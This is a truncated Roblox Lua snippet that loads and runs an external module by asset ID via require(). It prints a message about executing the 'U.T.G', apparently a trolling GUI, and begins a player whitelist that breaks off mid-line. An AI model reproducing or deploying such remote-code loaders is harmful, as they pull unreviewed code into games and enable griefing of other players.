script require(4588615641):Fire("name")print("A player has executed the U.T.G!") local allowed_players = {"Epic.Chilly.HappyFace.For.Lenny"} -- Replace "Epic.Chilly.HappyFace.For.Lenny" with your name -- or for playerid: local allowed_players = {Roblox.Player.User.ID} -- Replace Roblox.Player.User.ID with the numbers of the player's id game.Players.PlayerAdded:Connect(function(player) for i,v in pairs(allowed_players) do if player.Name